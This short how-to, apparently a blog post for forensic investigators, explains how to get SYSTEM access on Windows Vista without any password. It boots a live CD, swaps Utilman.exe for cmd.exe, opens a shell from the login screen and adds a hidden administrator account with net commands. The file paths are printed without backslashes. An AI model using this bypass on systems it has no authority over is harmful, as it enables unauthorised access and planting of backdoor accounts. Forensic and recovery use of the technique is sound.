Gaining SYSTEM user access in Microsoft Vista is a simple procedure and allows a forensic investigator higher level access then the administrator. This method of gaining access to a Microsoft Vista system doesn't require the investigator to know any of the usernames or passwords for the system.
- Boot the Vista machine with BackTrack or any other Live CD.
- Mount the NTFS partition.
- Rename C:WindowsSystem32Utilman.exe to anything else such as Utilman.old
- Copy C:WIndowsSystem32cmd.exe to C:WindowsSystem32Utilman.exe
- At the Vista login screen, press the Windows key + U to launch the Utility Manager.
- Start cmd.exe
- Start explorer.exe
You can view a video showing this procedure here.
Also, once a command prompt is obtained via this method, we can use it to create a new user, add this user to the administrators group via the net command and then use this account to rightfully log in using the following commands:
net user USERNAME /add
net localgroup administrators USERNAME